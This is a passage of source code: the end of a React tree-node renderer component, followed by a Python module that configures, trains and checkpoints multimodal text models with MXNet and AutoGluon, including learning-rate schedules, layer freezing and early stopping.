)}
</div>
);
}
}
FileThemeTreeNodeRenderer.defaultProps = {
swapFrom: null,
swapDepth: null,
swapLength: null,
canDrop: false,
draggedNode: null,
};
FileThemeTreeNodeRenderer.propTypes = {
treeIndex: PropTypes.number.isRequired,
treeId: PropTypes.string.isRequired,
swapFrom: PropTypes.number,
swapDepth: PropTypes.number,
swapLength: PropTypes.number,
scaffoldBlockPxWidth: PropTypes.number.isRequired,
lowerSiblingCounts: PropTypes.arrayOf(PropTypes.number).isRequired,
listIndex: PropTypes.number.isRequired,
children: PropTypes.node.isRequired,
// Drop target | connectDropTarget: PropTypes.func.isRequired,
isOver: PropTypes.bool.isRequired,
canDrop: PropTypes.bool,
draggedNode: PropTypes.shape({}),
// used in dndManager
getPrevRow: PropTypes.func.isRequired,
node: PropTypes.shape({}).isRequired,
path: PropTypes.arrayOf(
PropTypes.oneOfType([PropTypes.string, PropTypes.number])
).isRequired,
rowDirection: PropTypes.string.isRequired,
};
export default FileThemeTreeNodeRenderer; | |
models.py | import numpy as np
import scipy.special
import os
import math
import logging
import pandas as pd
import warnings
import time
import json
import pickle
import functools
import tqdm
from typing import Tuple
from autogluon.core.scheduler.scheduler_factory import scheduler_factory
from autogluon.core.utils import set_logger_verbosity
from sklearn.preprocessing import LabelEncoder
import mxnet as mx
from mxnet.util import use_np
from mxnet.lr_scheduler import PolyScheduler, CosineScheduler
from mxnet.gluon.data import DataLoader
from autogluon_contrib_nlp.models import get_backbone
from autogluon_contrib_nlp.lr_scheduler import InverseSquareRootScheduler
from autogluon_contrib_nlp.utils.config import CfgNode
from autogluon_contrib_nlp.utils.misc import grouper, \
count_parameters, repeat, get_mxnet_available_ctx
from autogluon_contrib_nlp.utils.parameter import move_to_ctx, clip_grad_global_norm
from autogluon.core import args, space
from autogluon.core.utils import in_ipynb, verbosity2loglevel
from autogluon.core.utils.utils import get_cpu_count, get_gpu_count
from autogluon.core.utils.loaders import load_pkl, load_pd
from autogluon.core.task.base import compile_scheduler_options_v2
from autogluon.core.task.base.base_task import schedulers
from autogluon.core.metrics import get_metric, Scorer
from autogluon.core.utils.multiprocessing_utils import force_forkserver
from autogluon.core.dataset import TabularDataset
from autogluon.core.decorator import sample_config
from autogluon.core.constants import BINARY, MULTICLASS, REGRESSION
from autogluon.core.scheduler.reporter import FakeReporter
from .modules import MultiModalWithPretrainedTextNN
from .preprocessing import MultiModalTextFeatureProcessor, base_preprocess_cfg,\
MultiModalTextBatchify, get_stats_string, auto_shrink_max_length, get_cls_sep_id
from .utils import average_checkpoints, set_seed
from .. import constants as _C
from ..utils import logging_config
from ..presets import ag_text_presets
from ... import version
logger = logging.getLogger(__name__) # return logger
@use_np
def get_optimizer(cfg, updates_per_epoch):
"""
Parameters
----------
cfg
Configuration
updates_per_epoch
The number of updates per training epoch
Returns
-------
optimizer
The optimizer
optimizer_params
Optimization parameters
max_update
Maximum update
"""
max_update = max(int(np.ceil(updates_per_epoch * cfg.num_train_epochs)), 3)
warmup_steps = int(np.ceil(updates_per_epoch * cfg.num_train_epochs * cfg.warmup_portion))
if cfg.lr_scheduler == 'triangular':
lr_scheduler = PolyScheduler(max_update=max_update,
base_lr=cfg.lr,
warmup_begin_lr=cfg.begin_lr,
pwr=1,
final_lr=cfg.final_lr,
warmup_steps=warmup_steps,
warmup_mode='linear')
elif cfg.lr_scheduler == 'inv_sqrt':
lr_scheduler = InverseSquareRootScheduler(warmup_steps=warmup_steps,
base_lr=cfg.lr,
warmup_init_lr=cfg.begin_lr)
elif cfg.lr_scheduler == 'constant':
lr_scheduler = None
elif cfg.lr_scheduler == 'cosine':
lr_scheduler = CosineScheduler(max_update=max_update,
base_lr=cfg.lr,
final_lr=cfg.final_lr,
warmup_steps=warmup_steps,
warmup_begin_lr=cfg.begin_lr)
else:
raise ValueError('Unsupported lr_scheduler="{}"'
.format(cfg.lr_scheduler))
optimizer_params = {'learning_rate': cfg.lr,
'wd': cfg.wd,
'lr_scheduler': lr_scheduler}
optimizer = cfg.optimizer
additional_params = {key: value for key, value in cfg.optimizer_params}
optimizer_params.update(additional_params)
return optimizer, optimizer_params, max_update
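# Usage sketch (illustrative, mirroring how train_function below consumes these return values):
#   optimizer, optimizer_params, max_update = get_optimizer(cfg.optimization, updates_per_epoch)
#   trainer = mx.gluon.Trainer(params, optimizer, optimizer_params, update_on_kvstore=False)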
@use_np
def apply_layerwise_decay(model, layerwise_decay, backbone_name, not_included=None):
"""Apply the layer-wise gradient decay
.. math::
lr = lr * layerwise_decay^(max_depth - layer_depth)
    Parameters
----------
model
The backbone model
layerwise_decay: int
layer-wise decay power
not_included: list of str
        A list of parameter names that are not included in the layer-wise decay
"""
if not_included is None:
not_included = []
    # Consider the task-specific fine-tuning layer as the last layer, followed by the pooler.
    # In addition, the embedding parameters get a smaller learning rate based on this setting.
if 'albert' in backbone_name:
# Skip if it is the ALBERT model.
return
if 'electra' in backbone_name:
# For ELECTRA, it's called all_encoder_layers
all_layers = model.encoder.all_encoder_layers
else:
# For other models, it's called all_layers
all_layers = model.encoder.all_layers
max_depth = len(all_layers) + 2
for key, value in model.collect_params().items():
if 'scores' in key:
value.lr_mult = layerwise_decay ** 0
if 'pool' in key:
value.lr_mult = layerwise_decay ** 1
if 'embed' in key:
value.lr_mult = layerwise_decay ** max_depth
for (layer_depth, layer) in enumerate(all_layers):
layer_params = layer.collect_params()
for key, value in layer_params.items():
            # Skip parameters whose name matches any entry in `not_included`.
            if any(pn in key for pn in not_included):
                continue
value.lr_mult = layerwise_decay ** (max_depth - (layer_depth + 1))
@use_np
def freeze_layers(model, backbone_name, num_trainable_layers):
if 'albert' in backbone_name:
# Skip if it is the ALBERT model.
return
if 'electra' in backbone_name:
# For ELECTRA, it's called all_encoder_layers
all_layers = model.encoder.all_encoder_layers
else:
# For other models, it's called all_layers
all_layers = model.encoder.all_layers
if num_trainable_layers < 0:
return
assert num_trainable_layers <= len(all_layers)
for i in range(len(all_layers) - num_trainable_layers):
for p in all_layers[i].collect_params().values():
p.grad_req = 'null'
return
def base_optimization_config():
"""The basic optimization phase"""
cfg = CfgNode()
cfg.lr_scheduler = 'triangular'
cfg.optimizer = 'adamw'
cfg.early_stopping_patience = 20 # Stop if we cannot find a better checkpoint
cfg.optimizer_params = [('beta1', 0.9),
('beta2', 0.999),
('epsilon', 1e-6),
('correct_bias', False)]
cfg.begin_lr = 0.0
cfg.batch_size = 128
cfg.nbest = 1 # Keep the top K performed models
cfg.per_device_batch_size = 16 # Per-device batch-size
cfg.auto_per_device_batch_size = True # Whether to automatically determine the runnable
# per-device batch_size.
cfg.val_batch_size_mult = 2 # By default, we 2X the batch size for validation
cfg.lr = 1E-4
cfg.final_lr = 0.0
cfg.num_train_epochs = 10
cfg.warmup_portion = 0.1
cfg.layerwise_lr_decay = 0.8 # The layer_wise decay
cfg.wd = 0.01 # Weight Decay
cfg.max_grad_norm = 1.0 # Maximum Gradient Norm
# The validation frequency = validation frequency * num_updates_in_an_epoch
cfg.valid_frequency = 0.2
# Logging frequency = log frequency * num_updates_in_an_epoch
cfg.log_frequency = 0.05
return cfg
def base_model_config():
cfg = CfgNode()
cfg.backbone = CfgNode()
cfg.backbone.name = 'google_electra_base'
cfg.network = MultiModalWithPretrainedTextNN.get_cfg()
cfg.num_trainable_layers = -1 # Use a negative number to indicate that all layers are trainable.
cfg.insert_sep = True # Whether to insert sep tokens between columns
cfg.train_stochastic_chunk = False # Whether to sample a stochastic chunk from the training text
cfg.test_stochastic_chunk = False # Whether to use stochastic chunk in testing
cfg.use_avg_nbest = False # Whether to average the top performed models and use that as the final model.
# This will usually give us better performance.
cfg._disable_update = False # This is a hack for trying to disable the update. Should not be used usually
cfg.inference_num_repeat = 1 # Whether to turn on randomness and repeat the inference for multiple times.
return cfg
def base_misc_config():
cfg = CfgNode()
cfg.seed = 123
cfg.exp_dir = './autonlp'
return cfg
def base_cfg():
cfg = CfgNode()
cfg.version = 1
cfg.optimization = base_optimization_config()
cfg.preprocessing = base_preprocess_cfg()
cfg.model = base_model_config()
cfg.misc = base_misc_config()
cfg.freeze()
return cfg
@use_np
def _classification_regression_predict(net, dataloader, problem_type, label_scaler,
has_label=True, extract_embedding=False,
num_repeat=1):
"""
Parameters
----------
net
The network
dataloader
The dataloader
problem_type
Types of the labels
label_scaler
        Label scaler. We will reverse the centering process for regression problems
has_label
Whether label is used
extract_embedding
Whether to extract the embedding
num_repeat
The number of repeats to get the prediction.
If it is larger than 1, we will average the predictions.
If it is a regression problem, we will directly average the outputs.
If it is a classification problem, we will average the logits
Returns
-------
predictions
The predictions
"""
import warnings
# Filter mxnet warnings
warnings.filterwarnings('ignore', module='mxnet')
predictions = [[] for _ in range(num_repeat)]
use_logits = num_repeat > 1 and (problem_type == MULTICLASS or problem_type == BINARY)\
and not extract_embedding
if use_logits:
logits = [[] for _ in range(num_repeat)]
ctx_l = net.collect_params().list_ctx()
for i in range(num_repeat):
for sample_l in grouper(dataloader, len(ctx_l)):
iter_pred_l = []
if use_logits:
iter_logits_l = []
for sample, ctx in zip(sample_l, ctx_l):
if sample is None:
continue
if has_label:
batch_feature, batch_label = sample
else:
batch_feature = sample
batch_feature = move_to_ctx(batch_feature, ctx)
if extract_embedding:
_, embeddings = net(batch_feature)
iter_pred_l.append(embeddings)
else:
pred = net(batch_feature)
if problem_type == MULTICLASS or problem_type == BINARY:
if num_repeat > 1:
iter_logits_l.append(pred)
pred = mx.npx.softmax(pred, axis=-1)
iter_pred_l.append(pred)
for pred in iter_pred_l:
predictions[i].append(pred.asnumpy())
if use_logits:
for ele in iter_logits_l:
logits[i].append(ele.asnumpy())
predictions[i] = np.concatenate(predictions[i], axis=0)
if problem_type == REGRESSION and not extract_embedding:
predictions[i] = label_scaler.inverse_transform(predictions[i])[:, 0]
if use_logits:
logits[i] = np.concatenate(logits[i], axis=0)
if num_repeat == 1:
return predictions[0]
else:
if use_logits:
logits = np.stack(logits, axis=0).mean(axis=0)
return scipy.special.softmax(logits, axis=-1)
else:
return np.stack(predictions, axis=0).mean(axis=0)
def calculate_metric(scorer, ground_truth, predictions, problem_type):
if problem_type == BINARY and scorer.name == 'roc_auc':
# For ROC_AUC, we need to feed in the probability of positive class to the scorer.
return scorer._sign * scorer(ground_truth, predictions[:, 1])
else:
return scorer._sign * scorer(ground_truth, predictions)
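# Note (added): for binary classification with roc_auc, `predictions` holds the (N, 2) softmax
# probabilities, so predictions[:, 1] above is the positive-class probability the scorer expects.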
@use_np
def train_function(args, reporter, train_df_path, tuning_df_path,
time_limit, time_start, base_config,
problem_type, column_types,
feature_columns, label_column,
log_metrics, eval_metric, ngpus_per_trial,
console_log, seed=None, verbosity=2):
"""
Parameters
----------
args
The arguments
reporter
Reporter of the HPO scheduler.
If it is set to None, we won't use the reporter and will just run a single trial.
train_df_path
Path of the training dataframe
tuning_df_path
Path of the tuning dataframe
time_limit
The time limit of calling this function
time_start
The starting timestamp of the experiment
base_config
Basic configuration
problem_type
Type of the problem.
column_types
Type of columns
feature_columns
The feature columns
label_column
Label column
log_metrics
Metrics for logging
eval_metric
The stopping metric
ngpus_per_trial
The number of GPUs to use per each trial
console_log
Whether to log it to console
seed
The random seed
verbosity
The verbosity
"""
import warnings
warnings.filterwarnings('ignore', module='mxnet')
warnings.filterwarnings('ignore', module='sklearn')
set_seed(seed)
is_fake_reporter = isinstance(reporter, FakeReporter)
if time_limit is not None:
start_train_tick = time.time()
time_left = time_limit - (start_train_tick - time_start)
if time_left <= 0:
if not is_fake_reporter:
reporter.terminate()
return
if is_fake_reporter:
search_space = args.rand
task_id = 0
else:
search_space = args['search_space']
task_id = args.task_id
# Get the log metric scorers
if isinstance(log_metrics, str):
log_metrics = [log_metrics]
# Load the training and tuning data from the parquet file
train_data = pd.read_pickle(train_df_path)
tuning_data = pd.read_pickle(tuning_df_path)
log_metric_scorers = [get_metric(ele) for ele in log_metrics]
eval_metric_scorer = get_metric(eval_metric)
greater_is_better = eval_metric_scorer.greater_is_better
cfg = base_config.clone()
specified_values = []
for key in search_space.keys():
specified_values.append(key)
specified_values.append(search_space[key])
cfg.merge_from_list(specified_values)
exp_dir = cfg.misc.exp_dir
exp_dir = os.path.join(exp_dir, 'task{}'.format(task_id))
os.makedirs(exp_dir, exist_ok=True)
cfg.defrost()
cfg.misc.exp_dir = exp_dir
cfg.freeze()
logger = logging.getLogger()
set_logger_verbosity(verbosity, logger)
logging_config(folder=exp_dir, name='training', logger=logger, console=console_log,
level=logging.DEBUG,
console_level=verbosity2loglevel(verbosity))
logger.log(10, cfg)
# Load backbone model
backbone_model_cls, backbone_cfg, tokenizer, backbone_params_path, _ \
= get_backbone(cfg.model.backbone.name)
if 'roberta' in cfg.model.backbone.name:
text_backbone = backbone_model_cls.from_cfg(backbone_cfg, return_all_hiddens=True)
else:
text_backbone = backbone_model_cls.from_cfg(backbone_cfg)
# Build Preprocessor + Preprocess the training dataset + Inference problem type
# TODO Dynamically cache the preprocessor that has been fitted.
if problem_type == MULTICLASS or problem_type == BINARY:
label_generator = LabelEncoder()
label_generator.fit(pd.concat([train_data[label_column], tuning_data[label_column]]))
else:
label_generator = None
preprocessor = MultiModalTextFeatureProcessor(column_types=column_types,
label_column=label_column,
tokenizer_name=cfg.model.backbone.name,
label_generator=label_generator,
cfg=cfg.preprocessing)
logger.info('Fitting and transforming the train data...')
train_dataset = preprocessor.fit_transform(train_data[feature_columns],
train_data[label_column])
with open(os.path.join(exp_dir, 'preprocessor.pkl'), 'wb') as of:
pickle.dump(preprocessor, of)
logger.info(f'Done! Preprocessor saved to {os.path.join(exp_dir, "preprocessor.pkl")}')
logger.log(10, 'Train Data')
logger.log(10, get_stats_string(preprocessor, train_dataset, is_train=True))
logger.info('Process dev set...')
tuning_dataset = preprocessor.transform(tuning_data[feature_columns],
tuning_data[label_column])
logger.info('Done!')
# Auto Max Length
if cfg.preprocessing.text.auto_max_length:
max_length = auto_shrink_max_length(
train_dataset,
insert_sep=cfg.model.insert_sep,
num_text_features=len(preprocessor.text_feature_names),
auto_max_length_quantile=cfg.preprocessing.text.auto_max_length_quantile,
round_to=cfg.preprocessing.text.auto_max_length_round_to,
max_length=cfg.preprocessing.text.max_length)
else:
max_length = cfg.preprocessing.text.max_length
train_stochastic_chunk = cfg.model.train_stochastic_chunk
test_stochastic_chunk = cfg.model.test_stochastic_chunk
inference_num_repeat = cfg.model.inference_num_repeat
if max_length < cfg.preprocessing.text.max_length:
inference_num_repeat = 1
cfg.defrost()
cfg.preprocessing.text.max_length = max_length
cfg.model.inference_num_repeat = inference_num_repeat
cfg.freeze()
with open(os.path.join(exp_dir, 'cfg.yml'), 'w') as f:
f.write(str(cfg))
logger.info(f'Max length for chunking text: {max_length}, '
f'Stochastic chunk: Train-{train_stochastic_chunk}/Test-{test_stochastic_chunk}, '
f'Test #repeat: {inference_num_repeat}.')
cls_id, sep_id = get_cls_sep_id(tokenizer)
train_batchify_fn = MultiModalTextBatchify(
num_text_inputs=len(preprocessor.text_feature_names),
num_categorical_inputs=len(preprocessor.categorical_feature_names),
num_numerical_inputs=len(preprocessor.numerical_feature_names) > 0,
cls_token_id=cls_id, sep_token_id=sep_id, max_length=max_length,
mode='train', stochastic_chunk=train_stochastic_chunk,
insert_sep=cfg.model.insert_sep)
test_batchify_fn = MultiModalTextBatchify(
num_text_inputs=len(preprocessor.text_feature_names),
num_categorical_inputs=len(preprocessor.categorical_feature_names),
num_numerical_inputs=len(preprocessor.numerical_feature_names) > 0,
cls_token_id=cls_id, sep_token_id=sep_id, max_length=max_length,
mode='test', stochastic_chunk=test_stochastic_chunk,
insert_sep=cfg.model.insert_sep)
# Get the ground-truth dev labels
gt_dev_labels = np.array([ele[-1] for ele in tuning_dataset])
if problem_type == REGRESSION:
gt_dev_labels = preprocessor.label_scaler.inverse_transform(np.expand_dims(gt_dev_labels,
axis=-1))[:, 0]
ctx_l = get_mxnet_available_ctx()
if ngpus_per_trial == 0:
ctx_l = [mx.cpu()]
else:
ctx_l = ctx_l[:ngpus_per_trial]
base_batch_size = cfg.optimization.per_device_batch_size
num_accumulated = int(np.ceil(cfg.optimization.batch_size / (base_batch_size * len(ctx_l))))
inference_base_batch_size = base_batch_size * cfg.optimization.val_batch_size_mult
train_dataloader = DataLoader(train_dataset,
batch_size=base_batch_size,
shuffle=True,
batchify_fn=train_batchify_fn)
dev_dataloader = DataLoader(tuning_dataset,
batch_size=inference_base_batch_size,
shuffle=False,
batchify_fn=test_batchify_fn)
if problem_type == REGRESSION:
out_shape = 1
elif problem_type == MULTICLASS:
out_shape = len(label_generator.classes_)
elif problem_type == BINARY:
assert len(label_generator.classes_) == 2
out_shape = 2
else:
raise NotImplementedError
net = MultiModalWithPretrainedTextNN(
text_backbone=text_backbone,
num_text_features=1,
num_categorical_features=len(preprocessor.categorical_feature_names),
num_numerical_features=len(preprocessor.numerical_feature_names) > 0,
numerical_input_units=None if len(preprocessor.numerical_feature_names) == 0 else len(preprocessor.numerical_feature_names),
num_categories=preprocessor.categorical_num_categories,
get_embedding=False,
cfg=cfg.model.network,
out_shape=out_shape)
net.initialize_with_pretrained_backbone(backbone_params_path, ctx=ctx_l)
net.hybridize()
num_total_params, num_total_fixed_params = count_parameters(net.collect_params())
logger.info('#Total Params/Fixed Params={}/{}'.format(num_total_params,
num_total_fixed_params))
# Initialize the optimizer
updates_per_epoch = int(np.ceil(len(train_dataloader) / (num_accumulated * len(ctx_l))))
optimizer, optimizer_params, max_update \
= get_optimizer(cfg.optimization,
updates_per_epoch=updates_per_epoch)
valid_interval = int(math.ceil(cfg.optimization.valid_frequency * updates_per_epoch))
train_log_interval = int(math.ceil(cfg.optimization.log_frequency * updates_per_epoch))
if 0 < cfg.optimization.layerwise_lr_decay < 1:
apply_layerwise_decay(net.text_backbone,
cfg.optimization.layerwise_lr_decay,
backbone_name=cfg.model.backbone.name)
freeze_layers(net.text_backbone,
backbone_name=cfg.model.backbone.name,
num_trainable_layers=cfg.model.num_trainable_layers)
# Do not apply weight decay to all the LayerNorm and bias
for _, v in net.collect_params('.*beta|.*gamma|.*bias').items():
v.wd_mult = 0.0
params = [p for p in net.collect_params().values() if p.grad_req != 'null']
trainer = mx.gluon.Trainer(params,
optimizer, optimizer_params,
update_on_kvstore=False)
# Set grad_req if gradient accumulation is required
if num_accumulated > 1:
logger.log(15, 'Using gradient accumulation.'
' Global batch size = {}'.format(cfg.optimization.batch_size))
for p in params:
p.grad_req = 'add'
net.collect_params().zero_grad()
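    # Note (added): with grad_req='add', gradients from the num_accumulated micro-batches are summed
    # in place before a single trainer.update() call and reset with zero_grad() after each update
    # in the training loop below.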
train_loop_dataloader = grouper(repeat(train_dataloader), len(ctx_l))
log_loss_l = [mx.np.array(0.0, dtype=np.float32, ctx=ctx) for ctx in ctx_l]
log_num_samples_l = [0 for _ in ctx_l]
logging_start_tick = time.time()
nbest = cfg.optimization.nbest
best_performance_score = [] # Stores the best performing checkpoints
best_performance_update_idx = [] # Stores the update index that reached the best validation performance
best_score = None
mx.npx.waitall()
no_better_rounds = 0
report_idx = 0
start_tick = time.time()
if time_limit is not None:
time_limit -= start_tick - time_start
if time_limit <= 0:
if not is_fake_reporter:
reporter.terminate()
return
best_report_items = None
report_local_jsonl_f = open(os.path.join(exp_dir, 'results_local.jsonl'), 'w')
logger.info(f'Local training results will be saved to '
f'{os.path.join(exp_dir, "results_local.jsonl")}.')
for update_idx in range(max_update):
for accum_idx in range(num_accumulated):
sample_l = next(train_loop_dataloader)
loss_l = []
for i, (sample, ctx) in enumerate(zip(sample_l, ctx_l)):
feature_batch, label_batch = sample
feature_batch = move_to_ctx(feature_batch, ctx)
label_batch = move_to_ctx(label_batch, ctx)
with mx.autograd.record():
pred = net(feature_batch)
if problem_type == MULTICLASS or problem_type == BINARY:
logits = mx.npx.log_softmax(pred, axis=-1)
loss = - mx.npx.pick(logits,
mx.np.expand_dims(label_batch, axis=-1))
elif problem_type == REGRESSION:
loss = mx.np.square(pred - mx.np.expand_dims(label_batch, axis=-1))
loss_l.append(loss.mean() / len(ctx_l) / num_accumulated)
log_loss_l[i] += loss_l[i] * len(ctx_l) * loss.shape[0] * num_accumulated
log_num_samples_l[i] += loss.shape[0]
for loss in loss_l:
loss.backward()
# Begin to update
trainer.allreduce_grads()
total_norm, ratio, is_finite = clip_grad_global_norm(params, cfg.optimization.max_grad_norm)
if not cfg.model._disable_update:
trainer.update(1.0, ignore_stale_grad=True)
# Clear after update
if num_accumulated > 1:
net.collect_params().zero_grad()
if (update_idx + 1) % train_log_interval == 0:
log_loss = sum([ele.as_in_ctx(ctx_l[0]) for ele in log_loss_l]).asnumpy()
log_num_samples = sum(log_num_samples_l)
logger.log(15,
'[Iter {}/{}, Epoch {}] train loss={:0.2e}, gnorm={:0.2e}, lr={:0.2e}, #samples processed={},'
' #sample per second={:.2f}. ETA={:.2f}min'
.format(update_idx + 1, max_update,
int(update_idx / updates_per_epoch),
log_loss / log_num_samples, total_norm, trainer.learning_rate,
log_num_samples,
log_num_samples / (time.time() - logging_start_tick),
(time.time() - start_tick) / (update_idx + 1)
* (max_update - update_idx - 1) / 60))
logging_start_tick = time.time()
log_loss_l = [mx.np.array(0.0, dtype=np.float32, ctx=ctx) for ctx in ctx_l]
log_num_samples_l = [0 for _ in ctx_l]
if (update_idx + 1) % valid_interval == 0 or (update_idx + 1) == max_update:
valid_start_tick = time.time()
dev_predictions = \
_classification_regression_predict(net,
dataloader=dev_dataloader,
problem_type=problem_type,
label_scaler=preprocessor.label_scaler,
has_label=False,
num_repeat=inference_num_repeat)
log_scores = [calculate_metric(scorer, gt_dev_labels,
dev_predictions,
problem_type)
for scorer in log_metric_scorers]
dev_score = calculate_metric(eval_metric_scorer, gt_dev_labels,
dev_predictions,
problem_type)
valid_time_spent = time.time() - valid_start_tick
find_better = False
find_topn_better = False
if len(best_performance_score) < nbest:
best_performance_score.append(dev_score)
best_performance_update_idx.append(update_idx + 1)
net.save_parameters(
os.path.join(exp_dir,
f'nbest_model{len(best_performance_score) - 1}.params'))
find_topn_better = True
                if best_score is None or (greater_is_better and dev_score >= best_score)\
                        or (not greater_is_better and dev_score <= best_score):
find_better = True
net.save_parameters(os.path.join(exp_dir, f'best_model.params'))
best_score = dev_score
else:
# First try to update the top-K
if greater_is_better:
if dev_score >= min(best_performance_score):
find_topn_better = True
replace_idx = np.argmin(best_performance_score)
best_performance_score[replace_idx] = dev_score
best_performance_update_idx[replace_idx] = update_idx + 1
net.save_parameters(
os.path.join(exp_dir, f'nbest_model{replace_idx}.params'))
if dev_score >= best_score:
find_better = True
net.save_parameters(os.path.join(exp_dir, f'best_model.params'))
best_score = dev_score
else:
if dev_score <= max(best_performance_score):
find_topn_better = True
replace_idx = np.argmax(best_performance_score)
best_performance_score[replace_idx] = dev_score
best_performance_update_idx[replace_idx] = update_idx + 1
net.save_parameters(
os.path.join(exp_dir, f'nbest_model{replace_idx}.params'))
if dev_score <= best_score:
find_better = True
net.save_parameters(os.path.join(exp_dir, f'best_model.params'))
best_score = dev_score
if not find_better:
no_better_rounds += 1
else:
no_better_rounds = 0
mx.npx.waitall()
loss_string = ', '.join(['{}={:0.4e}'.format(metric.name, score)
for score, metric in zip(log_scores, log_metric_scorers)])
logger.log(25, '[Iter {}/{}, Epoch {}] valid {}, time spent={:.3f}s,'
' total time spent={:.2f}min. Find new best={}, Find new top-{}={}'.format(
update_idx + 1, max_update, int(update_idx / updates_per_epoch),
loss_string, valid_time_spent, (time.time() - start_tick) / 60,
find_better, nbest, find_topn_better))
if reporter is not None:
report_items = [('iteration', update_idx + 1),
('report_idx', report_idx + 1),
('epoch', int(update_idx / updates_per_epoch))] + \
[(metric.name, score)
for score, metric in zip(log_scores, log_metric_scorers)] + \
[('find_better', find_better),
('find_new_topn', find_topn_better),
('nbest_stat', json.dumps([best_performance_score,
best_performance_update_idx])),
('elapsed_time', int(time.time() - start_tick))]
if eval_metric_scorer._sign < 0:
report_items.append(('reward_attr', -dev_score))
else:
report_items.append(('reward_attr', dev_score))
report_items.append(('eval_metric', eval_metric_scorer.name))
report_items.append(('exp_dir', exp_dir))
if find_better:
best_report_items = report_items
reporter(**dict(report_items))
report_local_jsonl_f.write(json.dumps(dict(report_items)) + '\n')
report_local_jsonl_f.flush()
report_idx += 1
if no_better_rounds >= cfg.optimization.early_stopping_patience:
logger.info('Early stopping patience reached!')
break
total_time_spent = time.time() - start_tick
if time_limit is not None and total_time_spent > time_limit:
break
# Average checkpoints
best_report_items_dict = dict(best_report_items)
best_report_items_dict['report_idx'] = report_idx + 1
reporter(**best_report_items_dict)
report_local_jsonl_f.write(json.dumps(best_report_items_dict) + '\n')
report_local_jsonl_f.close()
def get_recommended_resource(nthreads_per_trial=None,
ngpus_per_trial=None) -> Tuple[int, int]:
"""Get the recommended resources.
    Internally, we will try to use the GPU whenever possible. That means we will use
    a single GPU for fine-tuning.
Parameters
----------
nthreads_per_trial
The number of threads per trial provided by the user.
ngpus_per_trial
The number of GPUs per trial provided by the user.
Returns
-------
    nthreads_per_trial
        The recommended number of threads per trial.
    ngpus_per_trial
        The recommended number of GPUs per trial.
    """
if nthreads_per_trial is None and ngpus_per_trial is None:
nthreads_per_trial = get_cpu_count()
ngpus_per_trial = 1
elif nthreads_per_trial is not None and ngpus_per_trial is None:
ngpus_per_trial = 1
elif nthreads_per_trial is None and ngpus_per_trial is not None:
if ngpus_per_trial != 0:
num_parallel_jobs = get_gpu_count() // ngpus_per_trial
nthreads_per_trial = max(get_cpu_count() // num_parallel_jobs, 1)
else:
nthreads_per_trial = get_cpu_count()
nthreads_per_trial = min(nthreads_per_trial, get_cpu_count())
ngpus_per_trial = min(ngpus_per_trial, get_gpu_count())
assert nthreads_per_trial > 0 and ngpus_per_trial >= 0,\
'Invalid number of threads and number of GPUs.'
return nthreads_per_trial, ngpus_per_trial
@use_np
class MultiModalTextModel:
"""Learner of the multimodal text data.
    It will be called when the user calls `fit()` in TextPredictor.
It is used for making predictions on new data and viewing information about
models trained during `fit()`.
"""
def __init__(self, column_types,
feature_columns,
label_columns,
problem_type,
eval_metric,
log_metrics,
output_directory=None):
"""Creates model object.
Parameters
----------
column_types
The column types.
feature_columns
Name of the feature columns
label_columns
Name of the label columns.
problem_type
Type of the problem
eval_metric
The evaluation metric
log_metrics
The metrics for logging
output_directory
The output directory to save the model
logger
The logger
"""
super(MultiModalTextModel, self).__init__()
self._base_config = base_cfg()
self._base_config.defrost()
if output_directory is not None:
self._output_directory = self._base_config.misc.exp_dir = output_directory
self._base_config.misc.exp_dir = os.path.abspath(self._base_config.misc.exp_dir)
self._base_config.freeze()
self._output_directory = self._base_config.misc.exp_dir
self._column_types = column_types
self._eval_metric = eval_metric
self._log_metrics = log_metrics
self._label_columns = label_columns
self._feature_columns = feature_columns
self._problem_type = problem_type
# Need to be set in the train call
self._net = None # Network for training and inference
self._embed_net = None # Network for extract the embedding
self._config = None
self._results = None
self._preprocessor = None
@property
def results(self):
return self._results
@property
def preprocessor(self):
return self._preprocessor
@property
def output_directory(self):
""" Get the output directory. The trained model and the training logs
will be saved to this folder """
return self._output_directory
@property
def label_columns(self):
"""Name of the label columns"""
return self._label_columns
@property
def problem_type(self):
"""Types of the problem"""
return self._problem_type
@property
def feature_columns(self):
"""Name of the features"""
return self._feature_columns
@property
def base_config(self):
"""The basic configuration. Internally, we will fill values in the base config by values
in the search space."""
return self._base_config
@property
def results(self):
"""Results of the final model"""
return self._results
@property
def config(self):
"""The configuration of the final trained model."""
return self._config
@property
def net(self):
return self._net
def train(self, train_data, tuning_data,
num_cpus=None,
num_gpus=None,
time_limit=None,
tune_kwargs=None,
search_space=None,
plot_results=False,
console_log=True,
seed=None,
verbosity=2):
"""The train function.
Parameters
----------
train_data
The training data
tuning_data
The tuning data
num_cpus
Number of CPUs for each trial
num_gpus
Number of GPUs for each trial
time_limit
The time limits
tune_kwargs
Parameters of the HPO algorithms. For example, the scheduling
algorithm, scheduling backend, HPO algorithm.
search_space
The search space options
plot_results
Whether to plot results or not
console_log
Whether to log into the console
seed
The seed
verbosity
Verbosity
"""
set_seed(seed)
set_logger_verbosity(verbosity, logger)
start_tick = time.time()
assert len(self._label_columns) == 1, 'Currently, we only support single label.'
# TODO(sxjscience) Try to support S3
os.makedirs(self._output_directory, exist_ok=True)
if search_space is None:
search_space = \
ag_text_presets.create('default')['models']['MultimodalTextModel']['search_space']
search_space_reg = args(search_space=space.Dict(**search_space))
# Scheduler and searcher for HPO
if tune_kwargs is None:
tune_kwargs = ag_text_presets.create('default')['tune_kwargs']
scheduler_options = tune_kwargs['scheduler_options']
num_cpus, num_gpus = get_recommended_resource(num_cpus, num_gpus)
if num_gpus == 0:
if 'AUTOGLUON_TEXT_TRAIN_WITHOUT_GPU' in os.environ:
use_warning = int(os.environ['AUTOGLUON_TEXT_TRAIN_WITHOUT_GPU'])
else:
use_warning = False
if use_warning:
                warnings.warn('No GPU is detected in the machine and we recommend you to '
'use TextPredictor on a GPU-enabled instance. Currently, '
'training on CPU is slow.')
else:
raise RuntimeError('No GPU is detected in the machine and we will '
                                   'not proceed to run TextPredictor because it will train '
                                   'too slowly with only a CPU. You may try to set `ngpus_per_trial` '
'to a number larger than 0 when calling `.fit()`. '
'Also, you can set the environment variable '
'"AUTOGLUON_TEXT_TRAIN_WITHOUT_GPU=1" to force the model to '
'use CPU for training.')
logger.info(f"The GluonNLP V0 backend is used. "
f"We will use {num_cpus} cpus and "
f"{num_gpus} gpus to train each trial.")
if scheduler_options is None:
scheduler_options = dict()
if plot_results is None:
if in_ipynb():
plot_results = True
else:
plot_results = False
scheduler_options = compile_scheduler_options_v2(
scheduler_options=scheduler_options,
scheduler=tune_kwargs['search_strategy'],
